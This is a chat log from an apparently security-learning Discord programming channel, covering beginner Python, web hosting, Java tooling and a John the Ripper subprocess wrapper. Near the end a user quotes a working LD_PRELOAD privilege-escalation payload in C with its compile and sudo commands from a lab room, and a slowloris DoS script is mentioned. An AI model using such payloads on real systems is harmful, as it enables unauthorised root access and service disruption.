#programming

switch to C then come back to Python

Ew

No I'm going to JS

Looks beautiful

Please don't

what next?

Perl?

Ook!

Ook is no different than any other tape-abstracted turing machine 😦 how about scheme though

https://github.com/nektos/act

this is super cool

@drifting zodiac
i use this trick to read files into a loop in bash, not sure if it's faster

while read i; do 
  ssh thingy $i
done < ports.txt

I posted this question on stackexchange, but I thought I would give it a try here as well.
I'm trying to learn reverse engineering using Radare2. For this I compiled a hello world program with GCC on Ubuntu (version: gcc (Ubuntu 9.3.0-17ubuntu1~20.04) 9.3.0).

#include <stdio.h> int main() { printf("Hello, world!"); return 0; }
Compile it:

GCC -w hello_world.c -o hello_world
However, when I decompile it using Radare2:

r2 hello_world [0x00001060]> aaa [Cannot find function at 0x00001060 sym. and entry0 (aa) [x] Analyze all flags starting with sym. and entry0 (aa) [x] Analyze function calls (aac) [x] Analyze len bytes of instructions for references (aar) [x] Check for objc references [x] Check for vtables [x] Type matching analysis for all functions (aaft) [x] Propagate noreturn information [x] Use -AA or aaaa to perform additional experimental analysis. [0x00001060]> afl 0x00001090 4 41 -> 34 sym.deregister_tm_clones 0x000010c0 4 57 -> 51 sym.register_tm_clones [0x00001060]>
The main function does not show up. Searching for it specifically with pdf @main also does not work.

But the program runs fine, and other information I get using Radare (iI command for example) looks normal.

Can anyone explain to me why I can't get the main function to show?

Should you be starting it with r2 -d hello_world?

I tried that as well, but that also did not show me the main function

you might need to compile with debug symbols?

Thanks for the tip, I didn't know about those. I tried using -gO and -g3 but neither of those helped me find the main function. Any other suggestions?

is there a python module that lets me create unique strings of characters from the characters i provide

the random modual?

what kind of character strings?

but yeah otherwise random'll work if you provide the seed

and the character range

though if you need a unique identifier, I suggest using uuids

import random

l = list(input("Enter word --> ")) # Gets input

random.shuffle(l) # Shuffles the word

print("".join(l)) # Prints list joined to a string```

Random has its own function for it

@sour apex

😮

that just shuffles though

I think he wants to specify a set of characters and generate a random string from that set

but I could be wrong

The request seems vague.

I mean you could always pipe /dev/random through base64

You would need /dev/random to do that though.

thats what it does

you give it a set of characters such as

"rgudgfrgdksg"

it'll just reorder the letters, no?

and it randomly shuffles and returns it

yeah

I think thats what he wanted

His request was hard to understand

from characters I provide

I dunno, I assumed give something like "ABCDEFGHJK..." and return and arbitrary-lengthed random string with those characters

oh k

thats exactly what i want

i know the character length i just need to shuffle it in as many ways as possible

err, you want permutations of the string then?

like the set of all 4 character strings from a given 10 characters?

for example

could you give an example input and output please

Script:

import random, itertools, pprint

characters = list(input("Enter characters: ")) # Input unique characters
pprint.pprint(list(itertools.permutations(characters))) # Gets every different combination

Input: abc

Output:

[('a', 'b', 'c'),
 ('a', 'c', 'b'),
 ('b', 'a', 'c'),
 ('b', 'c', 'a'),
 ('c', 'a', 'b'),
 ('c', 'b', 'a')]

Script 2 (I prefer this way):

import itertools

characters = input("Enter characters: ")

for char in itertools.permutations(characters):
    print(''.join(char))

Input: abc

Output:

abc
acb
bac
bca
cab
cba

Or using list comprehension:

Script:

import itertools

characters = input("Enter characters: ")
char = [''.join(char) for char in itertools.permutations(characters)]

print(char)

input: abc

Output:
['abc', 'acb', 'bac', 'bca', 'cab', 'cba']

@sour apex

oh they want to do this

i know the character length i just need to shuffle it in as many ways as possible

You could easily do that to with multi threading for larger combinations

Seems pointless and out-of-scope

this worked thanks!

if its a big combination and you wanted to do it faster, multi threading would be the way to go

ok

But itertools.permutations is the best method for this as jabba said

Multithreading

def do_stuff(perm):
    return list(reversed(perm))
  
if __name__ == "__main__":
  with multiprocessing.Pool() as pool:
      results = pool.map(do_stuff, itertools.permutations(characters, r=len(characters)))```

`print results`

why not with concurrent.futures?

hmm

I guess that could also work

What is this for?

Can anyone write a python program for this , i just need the approach

Is this classwork

Nope , just a random ques i found

And which programming language?

In python

Or just the approach to solve this

Probably

Use a loop

To loop over the characters

Tried loops, but not getting the output right

Tried a bunch of stuff

not sure we're allowed to help with coursework

but string replace might be useful

you ought to charge your phone ngl

.replace()

and for loops

Sod the for loops

Just regex it

Nice li'l oneliner

yes.

Heys guys, anyone can give me a tip on how to create a loop to decode a base64 binary in python? I can decode it , but i don't seem to find a way to turn it into a script to decode it 5x .

Any good small project ideas for x86 ASM? Most of my go-to projects for high-level would take wayyyy too long in ASM.

entry program

I.E. enter ur password, if its wrong stop else allow access

for loop over it and repeatedly decode?

yes, i don't know how to grab the data from the decode and loop over it..

ah

x = "to_be_decoded"
for i in range(0, 4):
  x = x.decode_base64

remember that range end is non-inclusive.

And you could just put range(5) for 0,1,2,3,4

might sound like an idiot but how do you put fixed length for a string in a php form

wdym? strings are always fixed length 🤣 whenever u append a new string is created. (i am not talking about stringbuffer)

i just want a text field to accept only 10 characters and nothing less or more to be valid 😄

ah that's like checking normal string length:

$someinput = $_POST['input_field_name'];
if (strlen($someinput) != 10){
    die("YOU DED");
}

that should do the trick, i've tried following the assignment process so i was thinking if there is a way to not reinvent the wheel with something like maxLenght="10"

excuse my stupidity lol

there's probably a form field you can use as well

Either I am blind or very tired or a bit of both

Yeah validate server and clientside

Yeah, will have to do that it needs to match a regex query

Thanks alot!

no worriesss!

hello

i have a question

i wrote a bruteforce script and i wanted to test it on my machine

is it possible to use it in a vm and attack the host?

for education purposes only

????

nvm

Hello, i have web site. How can i protect it from hackers or attacks? And if someone hack my site. What informations will he get?

Your question is extremely vague. There are many different types of "hacks" and usually with creating websites you learn how to defend against them.
An example would be filtering input from the user to make sure commands cannot be executed, e.g. XSS, SQLi (yheses attacks are covered here: https://www.creativebloq.com/web-design/website-security-tips-protect-your-site-7122853)

You will have to conduct your own research on what your website may be vulnerable and how to protect it against attacks, once again your question is very vague.

1 keep it up to date
2 use secure passwords

can help

@true pumice mby in that that i am hosting it from home

how can i change it?

Change what, your host?

yes

to not host it from home

Well you can purchase from hosting companies.

There is no possibility of free hosting?

Maybe but I do not think it will be of high quality.

Okay, is it a big deal for me to host it from home?

is it too much dangerous?

Site just basically request stats from steam api and display it

I lack sufficient knowledge to provide extended help, I know people who host their websites from their own setup but they have advanced knowledge 🤷‍♂️

and what is the easiest way how to protect it?

Github and netlify do free decent hosting for static sites

Idk where your requests happen though.

static site meaning no php, no wordpress, no sql, etc

pinging steam apis from javascript is a bad idea if you have a token you need to use

Yes, i have a token

yeah then you'll need a more classic hosting solution

likeeeeeee?

what about repl.it

good question, I haven't looked into hosting in a long while

That's an online IDE.

yeah don't host from there, they won't like that

because i am hosting it from there 🙄

That is a very bad idea.

why

Repl.it is not a hosting service.

If you are going to host a website on their services, I would recommend purchasing one of their packages, the default package alone is not enough to host your website.

Nah, i dont want to pay for it

And if you are here, can u help me with problem with css?

Its a small problem

Hit me

i have this two .html s that i want to connect```html
<!DOCTYPE html>
<html>
<body style = "font-family: Verdana, sans-serif;">
<table>
<p style = "font-family:courier,arial,helvetica;">
<h2>Masko stats:</h2>
<tr><td>Total kills:</td><td>| 68960 |</td>
<tr><td>Total deaths:</td><td>| 62374 |</td>
<tr><td>Total wins:</td><td>| 29604 |</td>
<tr><td>Total demage done:</td><td>| 9653315 |</td>
<tr><td>Total planted bombs:</td><td>| 2808 |</td>
<tr><td>Total defused bombs:</td><td>| 694 |</td>
</table>
/and ohter
</body>
</html>

and another one is the same as this, only ints change.
and i want to display it side by side

so i have this

that's not a CSS problem

<!doctype html>
<html>
<style>
#main {
  width: 100wv;
  height: auto;
  display: flex;
  justify-content: space-between;
  align-items: flex-start;
  flex-direction: row;
}
</style>
  <body id='main'>
    {% include '2_aligator_compare.html' %}
    {% include '5_masko_compare.html' %}
    {% block content %}{% endblock %}
    <p>working</p>
  </body>
</html>

You want your data to be static?

ys

yes

this is how it display it

But i want to display it side by side

I think it's more easy to import this data in database and call them with php

1 html with 1 php script with sql query

for the hosting you can use freehostin

Repl.it isn't hosting service

thats not static Q.Q

    {% include '2_aligator_compare.html' %}
    {% include '5_masko_compare.html' %}
    {% block content %}{% endblock %}

This is literally Hugo but weird

i think you're trying to write in SSG lang without an SSG

?

https://gohugo.io/
https://www.gatsbyjs.com/

🙄 more easy on development from html

and obviously more safe

More safe?

what

Static data is much much much safer, easier to develop, and less likely to go wrong...

no matter how hard you try, you'll never write that code in pure HTML -- you need a static site generator

thats not in the default language

true

I hate html and css 😒

I TOO

Python for ever

yea

but i would like to figure out this problem..

Eww

Python is a good language

Just looks horrible

@stone kayak Can agree

python it's powerful scripting language 😍

Language looks bad when I code it

Just the structure

And the syntax

no i cant, its very easy to read

See bee doesn't like the look of it either

Language looks bad when I code it
Huh, I wonder why.

JavaScript however

Beautiful

SSGs are fine but that would mean exposing a personal api token that shouldn't be exposed

javacript 🙄

which version of JS?

JavaScript is a very powerful language and I think it will benefit me the most in the future.

more problematic language in the world, every version have more thank 10 exploits

every devops department need 2 workers only for javacript

If you look at a lot of web applications, while not all of them do, they use JS

I think understanding JavaScript would benefit my understanding of web applications as a whole

of course

but all Web applications move to python

Javascript is the clientside language

yeah browsers can't run python

it's true? every vertion of js its different from previous versions? server can

1 sec.....

not directly...

https://brython.info/

It is not Javascript code! Instead, you will find Python code in a script of type "text/python".

😉

you can communicate between client and server with python

every vertion of js its different from previous versions huh?

its python3

directly

https://www.quickstart.com/blog/10-famous-websites-built-with-python/

client-side

it's still JS 😛

@stone kayak thank you

nope

It is not Javascript code! Instead

well, a JS interpreter

it's question.

No they're not all different

They build on the last version

These are python backends

You said "yeah browsers can't run python"

So I googled

they can if they implement python

browsers can run python scripts like js scripts

"python websites"

web assembly is the future of client side programming tho tbh https://webassembly.org/

Rust clientside 🥰

Rust?

https://www.rust-lang.org/

Rust is hard

Mainly because I came from a language that has garbage collection

OK really interesting

but I think you need background on nonsript language for rust

whats going on here :P

anyone know py 2 ?

https://sol.gfxile.net/dontask.html

wait that whole page written in ?

Did you read the text?

The whole point is don't just ask "does anyone know this thing"

Ask your actual question directly.

ok

i am a beginner so i want a volunteer to help me learn

Don't learn python 2

by clarifying my doubts

ik

i want to learn python 3

You still haven't asked your actual question

gonna hotkey this

why cant we run python 2 in any software ?

Python2 is deprecated

Stop looking at python2

ok

I have no idea what you mean by "run it in any software"

so python 2 is basically outdated ?

By a long long time yes

like we cant run it in visual studio code

You can

But ok

Just stop learning or writing python2

ok

got it

It's a complete waste of your time if you continue.

ok

so where to learn python 3 ?

We are not here to replace google

ok thank you for your time

yeah, I need to share it at work...

https://nohello.net/

@brazen eagle there's another for you

yeah, I saw you link that one earlier

problem is they're all francophones at work, so...

i mean why but. i know it's a trend here. but what is harm of saying "yes" instead of sending this link to a new user.

because it's better to just ask the darned question than to have to wait for an immediate response

yeah but u don't have to wait. lol u are not obligated to answer any questions at all

you're more likely to get the question answered if you ask it right away

no i am saying that, "don't ask to ask, just ask" thing

i mean it's polite 😐

rather than saying "Hi, does anyone know X" ... ... ... and leave because noone is responding

like "hey can i ask something?"

Because they can learn to ask questions directly

you can say "Hey can I ask: <Question Here>"

i mean saying "go ahead" will do exactly that.

like when a user is here for a while it's 100% ok

but when the user is like not even verified

that means they don't know about this server and stuff

sure but it still takes more time that many of us don't always have

That's an additional interaction that's totally un needed. You could just ask the question.

It's not related to the server

It's a general rule that applies everywhere

true. but then again, no one is obligated to answer. u are answer because u want to.

What does that have to do with it?

this.

u want to reduce an interaction.

No, I want to get to the point

where u don't have to interact.

No one knows if they can help until they know the question

right exactly. how about saying go ahead and saying you don't have to ask for permission and stuff.

Open with the question. Save everyone's time.

if you're too lazy to ask the question properly, why should we go out of our way to help?

then probably u shouldn't. just help who is not lazy.

and asking for "hey can i ask a question" is not lazy

though I know it's easy to fall into the trap, I still do sometimes

it's more of a politeness

you can still be polite while asking the question

again i am only saying for the new user

noone's saying otherwise

It's a small change that actually leads to your questions being answered

which cannot be done without giving a person a link of some bs site?

cool

Sometimes the lesson needs to be rammed a bit

I regularly state 'just ask your question'.

It's a lesson people need to learn.

i have regularly seen u with "don't ask to ask" thing as well.

Yes

depends on ur mood probably

They're the same.

If you're taking it as rude, then you're misunderstanding completely

if u don't think it as rude then u got accustomed to certain things not necessarily positive.

again i am saying for the new users.

not the users that already know.

it does get frustrating time and time again

true. i would agree to that.

but it's like a customer vs store owner type thing. where store owner gets frustrated but the customer may be complete new who doesn't know how things work just yet

best teach them early on then 😉

i need to pip freeze, but its recording all of the packages I have -- even outside the virtualenv how do I do this?

its a 250mb file lol

not specifically pip freeze

cd  /mnt/c/Users/bee/Documents/Projects/nth/env/lib/python3.8/site-packages/ && zip -r9 /mnt/c/Users/bee/Documents/Projects/nth.zip . \ && cd /mnt/c/Users/bee/Documents/Projects/nth-web-api && zip -g ../nth.zip -r .```

it should only be freezing the non-venv parts that aren't overridden by the local environment

i pip installed 3 packages theres no way this entire baby is 250mb

which is normal, and why best practices are to install as few things as possible into the primary install directory

did your packages have dependencies? also, there could be system level stuff that is bloating it a lot

ahhhh

i can see its a bunch of stuff i own

yeah im 99% sure this virtualenv is literally just my packages

that i have

outside of it

uh oh

i broke it

real bad

isn't the newest pip v21 not 20?

uh oh

ah its the virutalenv nvm

sounds about right

at least you aren't dealing with conflicting dependency versions

https://sol.gfxile.net/dontask.html ?

can anyone help me get this python project down in size

to < 250mb

before i install dependencies

with dependencies

reeeeeeee

i cant believe its not <250mb

cython? unless you have a distinct requirement, you should be able to drop those out for system-agnostic reasons

@eternal frigate

Here

ohk

thnx

Np

i will i some time

hm?

guys I'm might try out programming. Can anyone recommend me a programming language?

depends on what you want to do

well i actually don't know what I can do with programming

my friend first told me about these things when he was making an aimbot

aimbots'll probably get you banned 😛

ik

Yeah, please no unethical or illegal questions

im not asking an illegal question?

Rule 9 says no discussion of illegal topics 😉

Or unethical*

oh sorry

as for programming in general, python seems to be well liked as a general-purpose language, Javascript is generally used for web stuff, C/C++ is usually used for embedded/general stuff. Java is reasonably popular outside the infosec crowd

though for some reason infosec really hates Java ...

I would probably say, find what you want to program and then research which is the best language.

As hydragyrum perfectly covered, there are main languages for different areas but there are plenty of upcoming languages that may suit your needs

yup

alright thank you guys!

Rust is gaining popularity for systems programming

Kotlin is nice 🙂

^ especially tools with speed

Rust* hah

for rust, yes

^_^;

I’m using Kotlin for my android game development course

Golang and ruby are fine options as well. Althouh ruby doesn’t have the momentum it used to.

Kotlin is great for Android

I'd clarify that C/C++ is used in more than just embedded, the only limits are how much time you want to spend on it and how driven you are to learn the deep arcane wizardry. Infosec loathes java not because of the language, but because of the JVM crap that gets pulled all the time with versions. "Oh sorry, we can't upgrade off that super old and super vulnerable version of Java 1.6 - here's our justification that doing so costs us more money with little to no benefit"

I have seen environments that had 5 different versions of the JVM on different webservers. Because the webapps running on them couldn't be upgraded

yes of course

C++ dev tends to be a bit slower than other languages, because there's a lot that is needed to think about - i think it's a very solid first language, but the learning curve at the very beginning is significantly steeper than python or java or go or haskell

and yeah the JVM is a bit of a pain at times

I get to deal with Java 8 every day because Java 9 broke a ton of things, and enterprise is slow

honestly, i would be happy if i never had to go through another SAST review for java. Kotlin or Quarkus seems like much more consistent languages between versions

Quarkus is awesome (though it's a framework, not a language)

I built a room with Quarkus and Kotlin compiled to native in a container so...

coming soon ™️

My opinion is that Java VM is slowly going to go away; Oracle gave away EE to the Eclipse foundation a couple years ago. if oracle thinks that the money on it is going away....

Nice - I hear a lot about Quarkus from others at work, but I haven't had a project that needed me to learn it (yet). It's always used in the way as Kotlin when its talkeda bout, so that was my assumption

I'll be more excited when ktor supports Kotlin/Native properly

JVM'll probably stick around for a while

Java as language has had some development in the last years, but EE is not really supporting an upgrade path for that.

it's Jakarta now iirc

Yep. And it's still immature in the upgrade path. Libraries don't support the newer VMs and their deployment models well.

honestly? best update/upgrade of java in the last decade is GraalVM

The profiling is astoundingly easy to use

Just about everything is breaking now with the update from javax to jakarta packaging.

it's definitely interesting

oof

Jetty has two stable release branches, one of which works with the old and one for the new servlet APIs.

assuming it's just a packaging change then it shouldn't be too bad

Packaging and API changes. Not just one.

if it's not source-compatible than that's bad

oh bloody hell

well, death by attrition it is

only thing about Quarkus that I don't like is that their gradle support is still a bit flaky sometimes

oh and don't get me started about gradle 😄

it's better than maven

True. Or ant 🙂

I kind of like Java the language, and the tooling available for it. For the libraries etc around it, not that much.

Gradle is pretty interesting tbf

though they tried to do what they could for the kotlin dsl

what language do u guys write for a quick exploit

depends

probably bash or python though

or powershell for windows

hydraaaaaaaaaaaaaaaaaaaaaaa

beeeeeeeeeeeeeee

what'd I break?

Depends on what you mean by 'quick'

like short

it doesnt require lots of typing

quick meaning can rapidly prototype I suppose

so I'm assuming scripting

I have a CF pages site at https://ddec84c2.polymath.pages.dev , the page doesnt load. CF says its fine. Netlify loads it correctly and works fine, just CF pages.

i get a buncha warnings

but it does work

Could someone help me out with a python web scraping problem?

Just ask your question

We don't know if we can help unless we know the queston

I'm trying to scrape different values from the financials section of https://finance.yahoo.com/quote/TSLA/financials?p=TSLA.

This is my code ```
from bs4 import BeautifulSoup
import requests

ticker = 'TSLA'

url = requests.get(f'https://finance.yahoo.com/quote/{ticker}/financials?p={ticker}').text
soup = BeautifulSoup(url, 'lxml')
income_table = soup.find_all('div', class_='M(0) Whs(n) BdEnd Bdc($seperatorColor) D(itb)')

for entry in income_table:
rev = entry.find('div',class_='Ta(c) Py(6px) Bxz(bb) BdB Bdc($seperatorColor) Miw(120px) Miw(140px)--pnclg Bgc($lv1BgColor) fi-row:h_Bgc($hoverBgColor) D(tbc)').text
gross_prof =entry.find('div',class_='Ta(c) Py(6px) Bxz(bb) BdB Bdc($seperatorColor) Miw(120px) Miw(140px)--pnclg Bgc($lv1BgColor) fi-row:h_Bgc($hoverBgColor) D(tbc)').text

print(rev,gross_prof)

However I only ever manage to scrape the first value (total revenue) and nothing below that (e.g. gross profit)

Do they have an API?

Because scraping is the worst

yahoo does have an API

the yahoo finance API, as i used it in uni hahaha 😄

its free toooo

oh really? I have only found a third party version and a statement that it got shut down cause it unintentionally violated some other third parties laws

WHAT

https://www.google.co.uk/amp/s/rapidapi.com/blog/how-to-use-the-yahoo-finance-api/amp/

Yahoo Finance API was shut down in 2017

Hi there, Yahoo had its API open to the public, unbeknownst to the exchanges and other data firms whose data they were using. So everyone who was using the Yahoo finance API was basically using it illegally with or without knowing it. The exchanges finally caught wind of it and it wasn’t until shortly after that the API got shut down.

And the rapidapi thing is the third party I was mentioning, but haven't looked into it

So is there any way of doing it via scraping or would that be too difficult/much work?

can someone help me in this?

its javascript

It accomplishes nothing

Is this for an exam?

no i just now started coding

im trying it out

Where's the exercise from?

codewars

Ok, what do you know about functions?

you’d need a third variable, if that helps at all

That's false.

oh

what language is it in?

JavaScript

But it doesn't matter

ohhh okay

i got it

Yeah your function is missing something rather important

anyone got good resources on R for analytics ?

hey guys, i just got a raspberry pi and i've just setup apache running on a certain IP address
as long as another device is connected to the same internet, it's able to access the server
however, once the device that's sending a request to the server is connected on a different internet connection
it can't connect to the server anymore
so if i device b is the client side and device a is the server
if device b is on the same internet connection as device a
then it works
otherwise the page is not recognized because the device b is on a different internet connection
i wanna host this flask server on a custom domain
how do i do that?

you'll need to probably need to do some NATing on your router/firewall

which basically translates a public port on your public ip to a port on your private ip

but unless you've got it tied down veryyyyy well i would suggest against it

since if someone finds a way to exploit your web app and get rce, say goodbye to your home network

Hi i need some help from somone who know c

I received two variables from the user and I want to compare them to places in a two-dimensional array and if they are equal then replace but only once I need to replace no more than once

how can i do it?

Sounds like a homework assignment

yes.. can you help me pls? i need to finish untill tomoroow at night

as a rule, I don't really help with homework

its not the homework i stuck in part from the homework its will help mr finish but you not giving me the answer

the question is also pretty vague

do some basic research, break the problem down into little tiny pieces, then build up the solution from there

Hey, can someone suggested me some good resources for Golang

https://golang.org/doc/code.html

come on, google a bit

Hi so.. in python can i get the output that an already running process produces? (i'm using ubuntu)

process produces?

no i mean the program

Afaik you'd need to do it with a process created by the python script @cursive zephyr, OR do it the hacky way with sockets or FIFOs

i saw that some people used subprocess module but for windows

I am highly confused and very lost.

Imma just head out

subprocess module works just as well on Linux

You have access to subprocesses streams, and can use them.

Let's say i run airodump-ng how would i access the live output in the terminal using it?

i want to get the bssid's and essid's

Oh

I did this with JTR, give me a second to pull my code.

@stone kayak Where did hash identifier go

I need my codeee

Fine I'll log in, I'm on the project anyway

oh you would know IF YOU WAS IN MY DISCORD

It was public for like

ever

ill get u the code

class john:
    pass

    """
    supports = set(["","",""])
    moduels = ["subprocess"]
    def crack(self, hash, quiet):
    if quiet:
        john = subprocess.Popen(
            ["john", hash, "--wordlist=" + wordlist], stdout=subprocess.PIPE)
    output, error = john.communicate()
        print("Jesus take the wheel! (output not supressed)")
    
    else:
        with open('/tmp/jtr_out.txt', 'w') as output:
            john = subprocess.Popen(
            ("john", "--fork=4", hash, "--wordlist=" + wordlist,), stdout=output, stderr=STDOUT)
            print("Output Supressed!")
            out, error = john.communicate()
    Thanks jabbba, will do this later :P
    """

Did you change that or did I really do a weird Job on that

no i just commented it out

see u've become a better programmer

you already hate what you was

I mean

I took a strange approach but as long as it works (which it doesn't)

@cursive zephyr Hope you can make sense of this

i hope so too XD

I can probably explain it, it was a few months ago haha

if you can plz do

Okay, I will do my best

BTW, it took a while of looking through the docs to get it working and to understand it

i just opened the docs to try to figure out how the module works

oh i see how it works you actually run the command through the module so it can capture the output

def crack( # This function cracks hashes, 
self, hash, quiet): # it takes two arguements: one being the hash and the other a boolean to check whether it should have output or supress the output
    if quiet:
        john = subprocess.Popen( # subprocess.Popen creates the sub process
            ["john", hash, "--wordlist=" + wordlist], stdout=subprocess.PIPE) # This is the command that is being run
    output, error = john.communicate() # This seems to output the error if there is one (not actually sure tbh)
        print("Jesus take the wheel! (output not supressed)") # This seems to catch whether it does supress the output

        with open('/tmp/jtr_out.txt', 'w') as output: # This opens the output file
            john = subprocess.Popen( # Creates subprocesses
            ("john", "--fork=4", hash, "--wordlist=" + wordlist,), stdout=output, stderr=STDOUT) #Command to be run on the terminal, stdout stores the output in "/tmp/jtr_out.txt"
            print("Output Supressed!") # This is just a checkpoint to see if the code runs
            out, error = john.communicate() # This I still don't have a clue on what does

Hope this helps

Yeah it makes sense i thought this module would be more def to understand lol thank you

does it return the output in a string form?

is it allowed post a full python code here since it's bit too long to post in codeblock? I might need some help with troubleshooting

Post it in sections ^

I do not recall, my focus was trying to get it into a file, you may need to do some testing.

oh okay

use `

Lol that was my msg 😆

Would you mind putting that on this site?

It would be easier to read

what do you mean

This seems better fit for a GitHub repo

that's just my python file with quite a lot of comments

https://paste.pydis.com/

Can you put the python file here

https://paste.pythondiscord.com/avoliwuwuf.py

Just so the channel doesn't get cluttered and it's easier to read

there

Thanks

What's the problem?

issue is that the slow loris I made is not working

am I missing some stuff or what's wrong

Um this is a DDOS program right?

DoS*

Sory jabba 😕

it should slow the internet connection down to crawl but it doesn't do that for some reason, yes it's mainly for stress testing but technically it's DoS

I'm not sure the procedure on this

Lemme ask

https://youtu.be/XiFkyR35v2Y

Computerphile ftw

yes, that was the basis of the attack but I added some stuff there

I love that guy

I always thought slowloris just slowly loaded the page and it took the website offline

It kinda does that yes

I read like one post 3 years ago and haven't thought about it since

I tried to find ascii lori but didn't so I went with sloth since it's reminding of the slowness this thing can cause, if it worked right

the thing is to slow things to a crawl and then inject stuff before resuming normal speed, afaik

@novel imp Why are you doing this?...

just to experiment and learn, mainly, I have no intentions on using my skills to harm people, I use ddos stuff just to test my own server

A) DoS
B) Good. As long as it's for educational purposes only

yes, that's my main goal, to educate myself about these so I can be knowledgeful about them if I encounter them

to know your enemy is half the battle or how the saying went

That's not ddos.

yea got it mixed up, my bad

@novel imp Just an FYI - I've taken down the code samples you put up in this here channel - Wouldn't want any naughty new users finding it and trying to use it for bad purposes 🙂

that's good

safety first right

Zactly.

@stone kayak Using globals() is bad practice, right?
So if I have four instances of the class "Team", do I have two manually do:

print("[1]", team1.get_name)
print("[2]", team2.get_name)
print("[3]", team3.get_name)
print("[4]", team4.get_name)

Or is there an easier, better looking way?

idek what globals is

The globals dictionary?

I've heard of

globls var

But never globals dictionary

hm yeah

that looks bad

Oh this

https://www.programiz.com/python-programming/methods/built-in/globals

My computer WiFi is super slow Jesus

i think using any type of variable is bad, perhaps rewrite in an entirely variable-less functional style?

How come your using repli and not python on your own machine? Or...

Just allows me to do things like this:

teams = ["team1", "team2", "team3", "team4"]

for index, team in enumerate(teams, start=1):
  team = globals()[team]

Jabba

Yes?

For team in teams: print (team.get_name)

Excuse that formatting

Mobile sucks

You can iterate through an array of teams

That was a poor example, I want to dynamically create teams (I am trying to avoid dictionaries).

Pass a list of teams around between stuff if you need to

teams = ["team1", "team2", "team3", "team4"]

for team in teams:
  team = team_class.Team()

Because this will not work

Why do you want to avoid dictionarys?

I do not want to create constant for loops when I need the information, looks messy to me

Wdym for loop?

Can't you just do

team["name"]

Not only that but it looks like this:

    teams = {
        "team1": team_class.Team(), 
        "team2": team_class.Team(), 
        "team3": team_class.Team(), 
        "team4": team_class.Team()
        }

    print(teams["team1"].team_name)

Ignore the indent

Ah I see

I personally think that looks fine, at least, that's how I would do it

If there is no other way, apart from globals(), I will continue using them but it is not something I necessarily want.

I still can't work out what you're doing

^

I may be thinking about something completely different to what you want

But what about using a namedtupel

Basically, I am creating a program but I am trying to avoid using lots of print statements.
The program requires a lot of user input to navigate between screens.
Instead of doing

print(team1.name)
print(team2.name)
print(team3.name)
print(team4.name)

I simply want to just do

for x in y:
  print(team.name)

I know how to do it with dictionaries but I was wondering if there was another way to do it.
I want to make the whole program as dynamic as I can without going into advanced constructs etc.

Ohhhh

That makes sense

Right

Just stick your objects in an array

Do you know how many teams there will be?

Heck, it's all done by reference anyway, so you could outright have both 🤷‍♂️

I think I might have just solved my own problem, hold on

Would a named tupel be of any use

import collections

Person = collections.namedtuple('Person', 'name age gender')

print 'Type of Person:', type(Person)

bob = Person(name='Bob', age=30, gender='male')
print '\nRepresentation:', bob

jane = Person(name='Jane', age=29, gender='female')
print '\nField by name:', jane.name

print '\nFields by index:'
for p in [ bob, jane ]:
    print '%s is a %d year old %s' % p
    ```

(yes, it works in python3)

See I want something like this but it errors out:

    teamNames = ["team1", "team2",
            "team3", "team4"]

    teams = {
        "team1": team_class.Team(), 
        "team2": team_class.Team(), 
        "team3": team_class.Team(), 
        "team4": team_class.Team()
        }

    for name in teamNames:
        print(name.team_name)

I am probably missing something huge but I have no clue.

un

Team names should be

teamNames = teams["team1"], teams["team2"]

Yeah but my minor OCD is not happy with that

You and your OCD

Hmmmm

If it is the only way, I'll have to make do

Team = namedtupel("Team",["class"])

Team1 = Team(team_class.Team())
....etc


teamNames = [team1, team2, etc]

for team in teamNames:
       print(team[0].team_name)

Like this???

@true pumice

I'm here

@true pumice come here ????

I think I am just going to stick with the dictionary and array version, I will just have to make it look pretty. Hah, thanks for your suggestions though :)

oi rudeboi you finna catch these hands if you don watch yoself

No worries, good luck with it 😆

Also how come you aren't in bees server? :(

I left all servers that were not active :p

"not active"

you just werent in the cool hidden chats

Seems like a you problem

seems like you're not in Bee's private cloud club

Good.

How can i find the largest char on char array?

I have 10 in the array and idk how can i find the largest one

Ok, So I'm not gonna do your work for you - But go through it like this:

You have an array of numbers.

You want to find the biggest.

How does the computer know which one is the biggest?

How would YOU pick the biggest number?

Thanks you @humble venture

thats a very clever hint haha

There are lots of ways of doing it, and your programming language may have built in functions for it

true and by using some oretor

opretors

evildevil - Back when I used to program, I'd pseudocode pretty much everything. I found that 60% of the work was just the pseudocode, Then throw syntax at it, then work out the complex bits, then spend a few days going mad because I can't figure out why it's not working. It's my process

thats the great way of doin it

I was talking to Jabba about this the other day - He prefers to dive straight in with the code

thats a bad practice, yet most of us do that

we go through 100s of trial and errors

For small programs, it aint no thing. I was just amazed that he wasn't commenting his code as he went

instead we should think ahead make a psuedo version like u said

I am guilty of it too

meee too but lately i am trying to parctise this way diveng straight into the code saves time but i make many mistakes thats why

It's just a case of building good habits

actually it help me to improve my understanding and logic behind the program

as i am stll learning to code

Tips:

1. Define the problem, divide it into sub-problems
2. Think about approaches u can use to solve those subproblems
3. Write a psuedo code for the subproblem
   Repeat step 2 and 3 for a couple of times
4. Write the actual code

Oh 100%. Especially if you break it down by code-block. Makes it a little easier to debug

5.panic because deadline is approaching

6. Mess up everything

7. Cry about it

7 coy from stack overflow

7. Stay up the nigh before and somehow perform a miracle of modern programming

coy

my stuff goes like.
Step 1 -5, then 6 on a loop

I was actually gonna jump onto some C# a while back - Just before I got into THM. I was considering app dev

I have to remove step 5 and 6 from my process cycle, and am trying to do it but its not going away lol

Have you got any projects on at the moment, Potato?

Well am working on a couple of University Projects rn.

i hope that they will end by end of Feb or Mid Feb, if everything goes right.

Oh sweet

Anything fun?

Yes, i do be making something like Shazam(the music identifier) but with a much bigger scope.{kinda}
If everything goes as planned it could even identify sounds like drip of water,buzzing of a bee

and similar minor things

Well,it is a team project so some of my teammates are working on Hardware and some of us are working on Software side of things.
I hope it would turn out good

https://tenor.com/view/good-luck-fingers-crossed-crossing-my-fingers-gif-7207830

Sounds like fun

For me,

Flow Charts > Pseudocode, It personal helps me visualise it more :laughing:

Oh yes, and when learning to program, it's not all about writing it, it's about understanding what it does, this helps you when bug fixing as you know where to look for.

in the privllage escalation arena room there task 10 there is a sudo (LD_PRELOAD) priv esc and the exploit is written in C is there any way to convert this into python

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
    unsetenv("LD_PRELOAD");
    setgid(0);
    setuid(0);
    system("/bin/bash");
}

gcc -fPIC -shared -o /tmp/x.so x.c -nostartfiles

sudo LD_PRELOAD=/tmp/x.so apache2

@hoary shore I am pretty sure you can't write shared objects in an interpreted language.
Actually, I'm completely sure you can't -- the whole point of them is that they contain pre-compiled functions to be linked into at a later date.

k

